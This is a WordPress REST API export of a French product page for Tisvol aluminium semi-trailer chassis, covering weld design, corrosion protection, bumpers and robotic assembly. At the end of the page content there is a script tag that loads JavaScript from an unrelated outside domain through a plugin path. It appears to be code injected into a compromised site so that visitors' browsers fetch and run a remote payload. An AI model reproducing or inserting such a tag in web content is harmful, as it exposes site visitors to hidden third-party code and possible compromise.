{"id":14193,"date":"2019-07-11T07:27:09","date_gmt":"2019-07-11T07:27:09","guid":{"rendered":"https:\/\/tisvol.com\/chasis\/"},"modified":"2019-12-04T03:31:10","modified_gmt":"2019-12-04T03:31:10","slug":"chassis-tisvol","status":"publish","type":"page","link":"https:\/\/tisvol.com\/fr\/comment\/chassis-tisvol\/","title":{"rendered":"Ch\u00e2ssis Tisvol"},"content":{"rendered":"\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-33yw-fe4ace012c6b9c696b8bb8b31f28441a\">\n.avia-section.av-33yw-fe4ace012c6b9c696b8bb8b31f28441a{\nbackground-color:#ffffff;\nbackground-image:unset;\n}\n<\/style>\n<div id='tisvol-tagline'  class='avia-section av-33yw-fe4ace012c6b9c696b8bb8b31f28441a main_color avia-section-default avia-no-border-styling  avia-builder-el-0  el_before_av_layout_row  avia-builder-el-first  avia-bg-style-scroll container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><main  role=\"main\" itemprop=\"mainContentOfPage\"  class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-14193'><div class='entry-content-wrapper clearfix'>\n<section  class='av_textblock_section av-jj8pzx7e-f58ee2657ad4a3ea48b2f1ff7d628b0b '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h3 style=\"text-align: center;\">Powered by Superior Quality<\/h3>\n<\/div><\/section>\n\n<\/div><\/div><\/main><!-- close content main element --><\/div><\/div><div id='single-content-page-header'  class='av-layout-grid-container av-jtitiy8i-cb8224d08fbce2acdbc5f32c5bf0df2e entry-content-wrapper main_color av-flex-cells  avia-builder-el-2  el_after_av_section  el_before_av_section  gradient-half-grey-to-white animation-element grid-row-not-first  container_wrap sidebar_right'  >\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jtitklia-003a38b7a28449caea4e2c8d204017e2\">\n.flex_cell.av-jtitklia-003a38b7a28449caea4e2c8d204017e2{\nvertical-align:middle;\nheight:480px;\nmin-height:480px;\n}\n.responsive #top #wrap_all .flex_cell.av-jtitklia-003a38b7a28449caea4e2c8d204017e2{\npadding:0px 0px 0px 0px !important;\n}\n<\/style>\n<div class='flex_cell av-jtitklia-003a38b7a28449caea4e2c8d204017e2 av-gridrow-cell av_one_half no_margin  avia-builder-el-3  el_before_av_cell_one_half  avia-builder-el-first  content-align-middle av-zero-padding avia-full-contain'  ><div class='flex_cell_inner'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6\">\n.flex_column.av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-1y9y0p-659967d3e94ffbd9c96fa4453fc050c6 av_one_full  avia-builder-el-4  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec\">\n#top .hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec{\nmargin-top:20px;\nmargin-bottom:20px;\n}\n.hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec .hr-inner{\nwidth:30px;\nborder-color:#333333;\n}\n<\/style>\n<div  class='hr av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec hr-custom  avia-builder-el-5  el_before_av_textblock  avia-builder-el-first  hr-center hr-icon-no'><span class='hr-inner inner-border-av-border-thin'><span class=\"hr-inner-style\"><\/span><\/span><\/div><br \/>\n<section  class='av_textblock_section av-jj8rms6q-e378de6f514244f1a118e0085a2fbc7d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><h2 class=\"titular-principal\" style=\"text-align: center;\">CH\u00c2SSIS<\/h2>\n<h4 class=\"subtitular-principal\" style=\"text-align: center;\">&#8211;\u00a0LE FACTEUR DE QUALIT\u00c9 SUP\u00c9RIEURE DE TISVOL &#8211;<\/h4>\n<\/div><\/section><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec\">\n#top .hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec{\nmargin-top:20px;\nmargin-bottom:20px;\n}\n.hr.av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec .hr-inner{\nwidth:30px;\nborder-color:#333333;\n}\n<\/style>\n<div  class='hr av-jvnl7dh4-0f7374c0562294c7a06e96c2ef6600ec hr-custom  avia-builder-el-7  el_after_av_textblock  avia-builder-el-last  hr-center hr-icon-no'><span class='hr-inner inner-border-av-border-thin'><span class=\"hr-inner-style\"><\/span><\/span><\/div><\/p><\/div>\n<\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1\">\n.flex_cell.av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1{\nvertical-align:middle;\nheight:480px;\nmin-height:480px;\nbackground:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/soldadura.jpg) 100% 50% no-repeat scroll ;\n}\n.responsive #top #wrap_all .flex_cell.av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1{\npadding:0px 0px 0px 0px !important;\n}\n<\/style>\n<div class='flex_cell av-jtitmk5z-2cc51f2e7d1e4d7ca364366c2e21b1a1 av-gridrow-cell av_one_half no_margin  avia-builder-el-8  el_after_av_cell_one_half  avia-builder-el-last  content-align-middle av-zero-padding avia-full-contain'  ><div class='flex_cell_inner'><\/div><\/div>\n<\/div>\n<div id='racional'  class='avia-section av-jjgvfjza-47523f58ab7c161de1e310c770dd1e1e main_color avia-section-default avia-no-border-styling  avia-builder-el-9  el_after_av_layout_row  el_before_av_submenu  gradient-grana border-top-fillet avia-bg-style-scroll av-minimum-height av-minimum-height-custom av-height-custom  container_wrap sidebar_right'   data-av_minimum_height_px='420'><div class='container av-section-cont-open' style='height:420px'><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-14193'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-5fsy-4f428072adb752bd4df234841250c4e6\">\n.flex_column.av-5fsy-4f428072adb752bd4df234841250c4e6{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-5fsy-4f428072adb752bd4df234841250c4e6 av_one_full  avia-builder-el-10  avia-builder-el-no-sibling  first flex_column_div av-zero-column-padding  '     ><section  class='av_textblock_section av-jj8rms6q-bd76de550ec01b29325c9bd44a0927a3 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock somos-capaces'  itemprop=\"text\" ><p style=\"text-align: center;\">Nous n\u2019offrons que la plus<br \/>\nhaute qualit\u00e9<\/p>\n<\/div><\/section><\/div><\/div><\/div><\/div><!-- close content main div --><\/div><\/div><div id='sub_menu1'  class='av-submenu-container av-jqz6x91q-d7622458eff02305cba2ea0313b5a133 socket_color  avia-builder-el-12  el_after_av_section  el_before_av_section  submenu-not-first container_wrap sidebar_right' style='z-index:301' ><div class='container av-menu-mobile-disabled av-submenu-pos-center'><ul id='av-custom-submenu-1' class='av-subnav-menu' role='menu'>\n<li class='menu-item av-av_submenu_item-14ae99c034419d5144e2f9a232548d0e menu-item-top-level menu-item-top-level-1' role='menuitem'><a href='#chasis-tisvol'  ><span class='avia-bullet'><\/span><span class='avia-menu-text'>LE CH\u00c2SSIS TISVOL<\/span><\/a><\/li>\n<li class='menu-item av-av_submenu_item-386aa0dc20542e0aa6109403f4a7df26 menu-item-top-level menu-item-top-level-2' role='menuitem'><a href='#sistemacontructivo'  ><span class='avia-bullet'><\/span><span class='avia-menu-text'>SYST\u00c8ME DE CONSTRUCTION<\/span><\/a><\/li>\n<\/ul><\/div><\/div><\/p>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de\">\n.avia-section.av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/04\/tisvol-chasis-comunes-chasis-1300.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='chasis-tisvol'  class='avia-section av-jrusewh6-20bace4d7b9ff0f2f7f7ad0b8364f1de main_color avia-section-large avia-no-border-styling  avia-builder-el-13  el_after_av_submenu  el_before_av_section  border-top-fillet animation-element avia-full-contain avia-bg-style-scroll av-section-color-overlay-active av-minimum-height av-minimum-height-100 av-height-100  container_wrap sidebar_right'  data-section-bg-repeat='contain' data-av_minimum_height_pc='100' data-av_min_height_opt='100'><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-14193'><div class='entry-content-wrapper clearfix'>\n<div class='flex_column_table av-3zju-0c6870679c2b684b020567490d13dd7a sc-av_one_full av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-0c6870679c2b684b020567490d13dd7a\">\n.flex_column.av-3zju-0c6870679c2b684b020567490d13dd7a{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-0c6870679c2b684b020567490d13dd7a av_one_full  avia-builder-el-14  el_before_av_one_half  avia-builder-el-first  appear-from-bottom first flex_column_table_cell av-equal-height-column av-align-top  '     ><section  class='av_textblock_section av-jkdqein2-bf1f083bfb68ea2de0458ea6ccc99a28 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock fade-in special-content-page-heading'  itemprop=\"text\" ><h2>LE CH\u00c2SSIS TISVOL<\/h2>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><div class='flex_column_table av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb sc-av_one_half av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb\">\n.flex_column.av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-7eb106f29ed9bc0b3ed49302cbd81feb av_one_half  avia-builder-el-16  el_after_av_one_full  el_before_av_one_half  appear-from-left first no_margin flex_column_table_cell av-equal-height-column av-align-top  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-8fd12ab25be9521be479acde33e03210 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-left'  itemprop=\"text\" ><h4>Le ch\u00e2ssis le plus exigeant de toutes les semiremorques<\/h4>\n<p>Nous \u00e9laborons notre propre ch\u00e2ssis avec les meilleures mati\u00e8res premi\u00e8res et une technologie innovante permettant d\u2019obtenir, probablement, le meilleur ch\u00e2ssis en aluminium du march\u00e9.<\/p>\n<h4>Poutres du ch\u00e2ssis en 2 pi\u00e8ces mod\u00e8le DS-1<\/h4>\n<p>Un seul bourrelet de soudure dans le sens de la longueur, sans soudures transversales affaiblissant le mat\u00e9riel de base. C\u2019est comme cela que les \u00ab\u00a0T\u00a0\u00bb sont toujours complets et sans assemblages.<\/p>\n<h4>Cadre du ch\u00e2ssis<\/h4>\n<p>La structure compacte du ch\u00e2ssis qui comprend des renforts d\u2019union entre les traverses et les longerons donne une plus grande r\u00e9sistance \u00e0 l\u2019ensemble du ch\u00e2ssis.<\/p>\n<h4>Ch\u00e2ssis Coroa<\/h4>\n<p>Le ch\u00e2ssis \u00e0 basculant droit le plus bas du march\u00e9 et d\u2019une largeur de 1.400\u00a0mm qui augmente la stabilit\u00e9 et assure la stabilit\u00e9 et garantit la s\u00e9curit\u00e9. [<a href=\"https:\/\/tisvol.com\/fr\/coroa\/\">+ de renseignements sur Coroa<\/a>]<\/p>\n<h4>Largeur maximale entre poutres 1.400\u00a0mm<\/h4>\n<p>Plus la largeur est importante, plus la stabilit\u00e9 est grande, aussi bien en conduisant que lors du basculement.<\/p>\n<h4>Ch\u00e2ssis \u00e0 col de cygne pour v\u00e9hicules longs<\/h4>\n<p>Dans les mod\u00e8les sans options Coroa, l\u2019option col de cygne peut \u00eatre la solution. La hauteur par rapport au sol diminue, ce qui implique un avantage bien que sa structure ait un impact n\u00e9gatif sur la tare.<\/p>\n<h4>Ch\u00e2ssis \u00e0 v\u00e9rins centraux<\/h4>\n<p>Boucliers int\u00e9gr\u00e9s et conceptions personnalis\u00e9s pour les carrossiers. Nous mettons toutes nos connaissances \u00e0 la disposition du fabricant de la carrosserie en acier.<\/p>\n<h4>La corrosion vous inqui\u00e8te<\/h4>\n<p>Il s\u2019agit d\u2019un probl\u00e8me fr\u00e9quent que nous nous effor\u00e7ons de r\u00e9soudre\u00a0: Visserie dacromet analys\u00e9e dans une chambre saline.<\/p>\n<h4>Corrosion galvanique par \u00ab\u00a0contact\u00a0\u00bb entre diff\u00e9rents mat\u00e9riaux m\u00e9talliques<\/h4>\n<p>Afin de l\u2019\u00e9viter, l\u2019on applique un isolant qui emp\u00eache cette corrosion. L\u2019on obtient ainsi une plus grande durabilit\u00e9 dans un \u00e9tat optimal.<\/p>\n<h4>Essai de freinage<\/h4>\n<p>Nous sommes pr\u00e9par\u00e9s pour effectuer des simulations de freinage avec charge et pour garantir la fonctionnalit\u00e9 absolue de nos produits.<\/p>\n<h4>Nous livrons tous les v\u00e9hicules avec des couvre-\u00e9crous sur les roues<\/h4>\n<p>Outre une bo\u00eete avec plusieurs unit\u00e9s d\u2019origine en tant que pi\u00e8ces de rechange.<\/p>\n<h4><em>Made in EU<\/em><\/h4>\n<p>Tous les v\u00e9hicules fabriqu\u00e9s par Tisvol sont construits conform\u00e9ment aux normes europ\u00e9ennes, valables dans la plupart des pays \u00e0 l\u2019\u00e9chelle mondiale.<\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-d09ed2c056e5c75d8de462082072c956\">\n.flex_column.av-3zju-d09ed2c056e5c75d8de462082072c956{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-d09ed2c056e5c75d8de462082072c956 av_one_half  avia-builder-el-18  el_after_av_one_half  avia-builder-el-last  appear-from-right no_margin flex_column_table_cell av-equal-height-column av-align-top  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-ee8beee1f925de83bae751ed1fa0b06e '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-right'  itemprop=\"text\" ><h4>Dissipez vos doutes concernant la hauteur des pare-chocs<\/h4>\n<p>En fonction de la longueur du v\u00e9hicule, celui-ci comprend conform\u00e9ment \u00e0 la r\u00e9glementation un pare-choc rabattable, avec diff\u00e9rentes hauteurs par rapport au niveau du sol, selon que la position de la suspension soit haute ou basse, ou un pare-choc extensible avec une hauteur fixe par rapport au sol.<\/p>\n<h4>Kit d\u2019asphalte<\/h4>\n<p>Il comprend les butoirs en acier qui prot\u00e8gent l\u2019essieu, la jupe rabattable qui ne s\u2019accroche pas au finisseur et qui prot\u00e8ge les t\u00e9moins et le joint en caoutchouc sp\u00e9ciale couleur bleue tol\u00e9rant jusqu\u2019\u00e0 200\u00a0\u00baC.<\/p>\n<h4>Les finitions sont fondamentales<\/h4>\n<p>Nous disposons chez Tisvol de finitions exclusives telles que la pointe du ch\u00e2ssis et bien d\u2019autres d\u00e9tails qui marquent une diff\u00e9rence.<\/p>\n<p>Par exemple le joint en caoutchouc dans la rainure de la barre du pare-choc: Les petits d\u00e9tails nous font grandir. Nous \u00e9vitons des accidents \u00e9ventuels en \u00e9vitant que le mat\u00e9riel se d\u00e9pose sur les rainures lors de la d\u00e9charge et qu\u2019il puisse \u00eatre projet\u00e9 sur un autre v\u00e9hicule lorsque la semiremorque est en mouvement.<\/p>\n<h4>Automatisation des \u00e9l\u00e9vateurs de l\u2019essieu<\/h4>\n<p>L\u2019EBS vous lib\u00e8re de l\u2019op\u00e9ration de syst\u00e8mes complexes d\u2019\u00e9l\u00e9vation.<\/p>\n<h4>Nouveau support de pare-choc<\/h4>\n<p>Une conception plus l\u00e9g\u00e8re du support qui comprend la fonction de crochet de remorquage.<\/p>\n<h4>Code de couleur pour l&rsquo;installation pneumatique<\/h4>\n<p>Il sera plus facile et rapide de r\u00e9soudre toute panne ou incident \u00e9ventuels gr\u00e2ce \u00e0 ce code visuel.<\/p>\n<h4>Double guide dans les carrosseries \u00e0 col de cygne<\/h4>\n<p>Il permet de simplifier la descente de la caisse au moyen d&rsquo;un double patin dans les v\u00e9hicules \u00e0 col de cygne.<\/p>\n<h4>Supports<\/h4>\n<p>Nous avons le support appropri\u00e9 pour toutes sortes d\u2019outils dont les transpalettes.<\/p>\n<h4>R\u00e8glement<\/h4>\n<p>\u00c9tiquettes obligatoires selon le r\u00e8glement CE incluses.<\/p>\n<h4>Plaque de garde lat\u00e9rale rabattable<\/h4>\n<p>Acc\u00e8s complet et confortable aux \u00e9l\u00e9ments int\u00e9rieurs du ch\u00e2ssis.<\/p>\n<h4>Traverses de suspension<\/h4>\n<p>Renfort maximal de s\u00e9rie qui a pour r\u00e9sultat un train roulant avec des caract\u00e9ristiques <em>off-road<\/em>.<\/p>\n<h4>Kit de lavage<\/h4>\n<p>Votre v\u00e9hicule sera l&rsquo;image de votre entreprise, c\u2019est pour cela que nous mettons \u00e0 votre disposition une mani\u00e8re facile de maintenir sont aspect reluisant.<\/p>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n\n<p><\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2\">\n.avia-section.av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/tisvol.com\/wp-content\/uploads\/2019\/05\/tisvol-sistema-constructivo-chasis.jpg);\nbackground-position:50% 50%;\nbackground-attachment:scroll;\n}\n.avia-section.av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2 .av-section-color-overlay{\nopacity:0.8;\nbackground-color:#ffffff;\n}\n<\/style>\n<div id='sistemacontructivo'  class='avia-section av-jrusewh6-88c700ea9aabd96b8baf785bc04e38b2 main_color avia-section-large avia-no-border-styling  avia-builder-el-20  el_after_av_section  avia-builder-el-last  avia-full-stretch avia-bg-style-scroll av-section-color-overlay-active av-minimum-height av-minimum-height-100 av-height-100  container_wrap sidebar_right'  data-section-bg-repeat='stretch' data-av_minimum_height_pc='100' data-av_min_height_opt='100'><div class=\"av-section-color-overlay-wrap\"><div class=\"av-section-color-overlay\"><\/div><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-14193'><div class='entry-content-wrapper clearfix'>\n<div class='flex_column_table av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3 sc-av_one_full av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3\">\n.flex_column.av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-e5c1bd1ad8e220aa1a98965fccd9d5e3 av_one_full  avia-builder-el-21  el_before_av_one_half  avia-builder-el-first  animation-element first flex_column_table_cell av-equal-height-column av-align-top  '     ><section  class='av_textblock_section av-jkdqein2-bf1f083bfb68ea2de0458ea6ccc99a28 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock fade-in special-content-page-heading'  itemprop=\"text\" ><h2>SYST\u00c8ME DE CONSTRUCTION<\/h2>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 --><div class='flex_column_table av-3zju-73960d72dd19bec1e29accf37b25eaa7 sc-av_one_half av-equal-height-column-flextable'>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-73960d72dd19bec1e29accf37b25eaa7\">\n.flex_column.av-3zju-73960d72dd19bec1e29accf37b25eaa7{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-73960d72dd19bec1e29accf37b25eaa7 av_one_half  avia-builder-el-23  el_after_av_one_full  el_before_av_one_half  animation-element first no_margin flex_column_table_cell av-equal-height-column av-align-middle  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-b59bf68f7a15f993915c422c36374652 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><h4>La fabrication du longeron<\/h4>\n<p>Coupure et union, soudure continue.<\/p>\n<h4>Assemblage du cadre<\/h4>\n<p>Chaque \u00e9l\u00e9ment \u00e0 sa place, tout bien distribu\u00e9 en fonction de chaque longueur, en formant une structure compacte et flexible en m\u00eame temps.<\/p>\n<h4>Alignement des essieux par laser<\/h4>\n<p>Cet \u00e9l\u00e9ment favorise un roulement optimal au point que nos clients soulignent cette qualit\u00e9.<\/p>\n<h4>La pr\u00e9cision de Kuka, notre robot, est in\u00e9gal\u00e9<\/h4>\n<p>Il travaille sur le ch\u00e2ssis afin de garantir un alignement parfait et d\u2019optimiser le confort lors de la conduite.<\/p>\n<h4>Nos robots font le soudage du ch\u00e2ssis<\/h4>\n<p>En reproduisant toute sorte de mouvements, ils font en sorte que la pression et la vitesse de soudage ne varient pas, ce qui permet une finition in\u00e9galable.<\/p>\n<h4>Nous retournons le ch\u00e2ssis<\/h4>\n<p>Et nos op\u00e9rateurs gagnent de la libert\u00e9 de mouvement. Ils peuvent ainsi faire un travail impeccable.<\/p>\n<\/div><\/section><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-3zju-85231ba60808b4e0963870b43b252976\">\n.flex_column.av-3zju-85231ba60808b4e0963870b43b252976{\nborder-radius:0px 0px 0px 0px;\npadding:30px 30px 30px 30px;\n}\n<\/style>\n<div  class='flex_column av-3zju-85231ba60808b4e0963870b43b252976 av_one_half  avia-builder-el-25  el_after_av_one_half  avia-builder-el-last  animation-element no_margin flex_column_table_cell av-equal-height-column av-align-middle  column-top-margin'     ><section  class='av_textblock_section av-jjzijvlr-b59bf68f7a15f993915c422c36374652 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock especificaciones appear-from-bottom'  itemprop=\"text\" ><h4>Automatiser le soudage circulaire du plateau du pivot d\u2019attelage<\/h4>\n<p>est tr\u00e8s compliqu\u00e9 en raison de sa taille r\u00e9duite. Cependant, nous adorons les d\u00e9fis et nous avons surmont\u00e9 celui-ci.<\/p>\n<h4>Corrosion galvanique<\/h4>\n<p>Nous l\u2019\u00e9vitons en appliquant une couche isolante sur les unions entre diff\u00e9rents m\u00e9taux (aluminium vs acier), par exemple sur la fixation du support des essieux, le support du v\u00e9rin, etc.<\/p>\n<h4>Nous pensons \u00e0 l&rsquo;apr\u00e8s-vente<\/h4>\n<p>Visibilit\u00e9 des num\u00e9ros de s\u00e9rie des amortisseurs, nous investissons pour rendre votre futur travail plus confortable.<\/p>\n<h4>\u00c9liminer l\u2019inutile<\/h4>\n<p>\u00c9limination des bavures sur les profil\u00e9s et sur les \u00e9l\u00e9ments d\u2019usage qui restent doux comme la soie.<\/p>\n<h4>La fiabilit\u00e9 se travaille<\/h4>\n<p>M\u00eame si le fabricant des essieux nous le garantit, nous rev\u00e9rifions le couple de serrage de chacun d\u2019entre eux afin de nous assurer qu\u2019il s&rsquo;agit du niveau optimal. Aucune pr\u00e9caution n\u2019est de trop lorsque la s\u00e9curit\u00e9 du client est entre nos mains.<\/p>\n<\/div><\/section><\/div><\/div><!--close column table wrapper. Autoclose: 1 -->\n<\/div><\/div><\/div><!-- close content main div --><\/div><\/div><\/div><div id='after_section_4'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-14193'><div class='entry-content-wrapper clearfix'><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":14245,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-14193","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/pages\/14193","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/comments?post=14193"}],"version-history":[{"count":0,"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/pages\/14193\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/pages\/14245"}],"wp:attachment":[{"href":"https:\/\/tisvol.com\/fr\/wp-json\/wp\/v2\/media?parent=14193"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}